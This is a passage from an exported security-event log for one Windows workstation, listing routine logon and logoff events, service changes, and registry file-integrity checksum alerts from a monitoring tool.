+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:04:02.364",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. 
the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:03:54.954",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'eda90e962d11223dcc2aa38c612f8db1' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '46828a156d8a5d6357730cd8697fe3b679bb75fd' +", +"Apr 24, 2020 @ 11:03:54.915",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '1c76fe95384571894fea60032499598b' +New md5sum is : 'ceeb06e70fb6f505171a7c9c711db2d5' +Old sha1sum was: 'd5716310782cfc86d0c74a24cb1f7f269a683771' +New sha1sum is : 'd8c1095e9ac02d487773bedbec465442b6695166' +", +"Apr 24, 2020 @ 11:03:54.903",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: 'ccf3312e10ed522b86fedf9f55f0ee11' +New md5sum is : '9ed8ee01a5e90b55c9e3ecfac1fe847c' +Old sha1sum was: 'aecc4f74462e7feab3e10f942d257edbd5ee7e0d' +New sha1sum is : 'e3d4fb00002e47cbb4fab5843100d604fcc5eeeb' +", +"Apr 24, 2020 @ 11:03:54.106",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : 'fe9f3d2ef09eed665f3e018cbf6645fc' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : 'ce373758828d2eb499f0ef2c64895e0a81a9c7dd' +", +"Apr 24, 2020 @ 11:03:52.579",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:03:52.330",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : '07dc19bc9fdca741ff145af99cb6b962' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : '21672b171b2f936929d2115820c42e4dd9cd8476' +", +"Apr 24, 2020 @ 11:03:52.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:52.064",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:51.454",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '71dd38be548797ce53eaa8938ef75c1c' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : '1ab1e055e97afe081bb9c3fe8d4828d7e7416aa2' +", +"Apr 24, 2020 @ 11:03:51.282",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : 'a030b1f0f699d16cbbdcb02462651a33' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'cd33fcd2825e0d7155b5e008ea746fde2e9f44e1' +", +"Apr 24, 2020 @ 11:03:50.846",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:50.829",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:50.642",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:03:49.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TrustedInstaller' checksum changed. +Old md5sum was: 'f5ea91602eb594fc2b4973f59a513fcb' +New md5sum is : '06f5c6f330af834dd08ce904d9ae7cc8' +Old sha1sum was: '7d45a8c18f8a7d6091a33c6ba0252b375312ca0c' +New sha1sum is : '0cf4c4c19a1201e41b9deba273320298f4f97b50' +", +"Apr 24, 2020 @ 11:03:48.032",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : 'dced103e4335a3cbc9f877909d35f249' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : 'e32425c2e3c2ae62b9591c6c3a4c676774ff1b10' +", +"Apr 24, 2020 @ 11:03:44.002",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 24, 2020 @ 11:03:41.517",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 24, 2020 @ 11:03:41.501",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '06f3d2f39343f57d32dd262e225aae84' +New md5sum is : 'd986956d161956f4b141437fa08b93c0' +Old sha1sum was: 'cc04983290ed793a09187d5412932856395b581c' +New sha1sum is : '5233ab213dffc9768aad8b2621a3d7286c52d461' +", +"Apr 24, 2020 @ 11:03:34.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +", +"Apr 24, 2020 @ 11:03:34.443",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:00:32Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:03:32.547",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:32.531",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:31.989",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:31.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:29.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:03:29.766",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:29.236",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NlaSvc\Parameters\Cache' checksum changed. +Old md5sum was: '774e15e7baf44381d722db864ab890d7' +New md5sum is : '50e564d651df4ed3711c530cb99d635a' +Old sha1sum was: '469daffaef7546bd68eba730d238e5592de9f468' +New sha1sum is : '9f85b67a6c52e8312f838e2577ad0927a069eeda' +", +"Apr 24, 2020 @ 11:03:27.313",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '3237690c2487672daf0d764886f2486e' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '7b1cc9112a2248a97fd7bebf1719ff23d879c73f' +", +"Apr 24, 2020 @ 11:03:25.532",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: '71d14a2d2a756124273e36b0738f8bba' +New md5sum is : '485b8cd95010a402c5cb5df739888197' +Old sha1sum was: 'c605e5d23f62dcaf8235115a11a8363912e96ea2' +New sha1sum is : '63bbc4fda93f12ece6293c204dfcb711133f2b09' +", +"Apr 24, 2020 @ 11:03:24.521",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'b4bce65b22aa4a519547960a719662c4' +New md5sum is : 'e7f150c5b2e694552ac7e3a81dfeb879' +Old sha1sum was: '3dac9d974e4d5d554b03c5e46ca8acc22b4826b6' +New sha1sum is : '3d5032ce5742ff04fd54fe3d6f8b54661fa11592' +", +"Apr 24, 2020 @ 11:03:24.406",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac' was added. +", +"Apr 24, 2020 @ 11:03:24.391",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 11:03:24.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:03:19.877",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'df3256a25e140f891367ef4f45e45db2' +New md5sum is : '4e809c5a694024fb7e8bf55fa6c9d969' +Old sha1sum was: 'e2d4eee52f1f6550a2d64d496dfa6aa49e9a8351' +New sha1sum is : '55bbefa8f8f38af4f7308965422d124b00ec27d0' +", +"Apr 24, 2020 @ 11:03:18.562",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. 
+Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '50ce2913739b9a0576dc7cc15a20dd59' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '64b431120ed76993c1ebfe47b1082e06b2b95e0e' +", +"Apr 24, 2020 @ 11:03:14.329",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '1f47b7195d8fed9969326bd01db47d06' +New md5sum is : '5ee04d11a7749eecbe4961fcea115bfe' +Old sha1sum was: 'ee63ae916c97b341f744e3bde4a840cc48ac014b' +New sha1sum is : '5a2a3c359b19360c172a2e0681a155502359134d' +", +"Apr 24, 2020 @ 11:03:13.594",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '5727fcd23252b0e1550791766fd7e652' +New md5sum is : '50ce2913739b9a0576dc7cc15a20dd59' +Old sha1sum was: '1a0a4badb9ef02d3f518064090d622844165b266' +New sha1sum is : '64b431120ed76993c1ebfe47b1082e06b2b95e0e' +", +"Apr 24, 2020 @ 11:03:12.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +", +"Apr 24, 2020 @ 11:03:04.891",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '8ef26438ac25bee10003522daa8b4a2f' +New md5sum is : 'b46732281ca86fbba34d92112530013f' +Old sha1sum was: 'b211ed5eee8285bb054c42335a4a0a9b2c9385b0' +New sha1sum is : 'f947da256090bd0fdc7e9fb2e5d566087624dd28' +", +"Apr 24, 2020 @ 11:03:04.782",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:02:58.407",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : 'f61272d9ef481aeaeaa355f2d71d77c7' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '42abc0c526e0c7a2d4d9d840fc642e3d0179b728' +", +"Apr 24, 2020 @ 11:02:57.047",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:57.031",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:56.968",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:56.953",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:56.734",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:56.719",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:54.207",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac' was added. 
+", +"Apr 24, 2020 @ 11:02:54.179",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:53.947",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:53.922",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:53.740",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:02:52.353",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.340",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:52.170",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.146",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:52.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_376ac\Security' was added. 
+", +"Apr 24, 2020 @ 11:02:49.423",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:49.407",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 11:02:49.405",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 11:02:49.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 11:02:49.368",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 11:02:49.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 11:02:49.328",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:48.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:48.330",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:48.078",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '36aaeb790a021755768e5fdf17bd44d7' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : 'ad54ef3d3cca7e4120e57f95847d5e12e3999904' +", +"Apr 24, 2020 @ 11:02:48.063",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7ad8870899ca2bf54b124825022fe0c6' +New md5sum is : '3f386f86526122f9896850ebf052d0e5' +Old sha1sum was: 'f0e34e29b93cf8d052ac5aea621d98e83c13b488' +New sha1sum is : '893e8a5eed791b28b06ba9456666d04f449facaf' +", +"Apr 24, 2020 @ 11:02:48.015",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'b863e575b2cca664b99a881713f146c2' +New md5sum is : 'dbf977dde384a4270cf8c3dffd90c88b' +Old sha1sum was: '95491db26e7e8c0fbc75daa3bcebc862313c84ff' +New sha1sum is : 'f778224b7c81e918affb793f903099d034c886a5' +", +"Apr 24, 2020 @ 11:02:47.422",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 11:02:45.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:45.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:20.218",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:17Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:02:14.001",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:49.586",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. 
+ +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:40.436",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DC8 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 11:01:40.421",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DE8 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 11:01:40.390",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
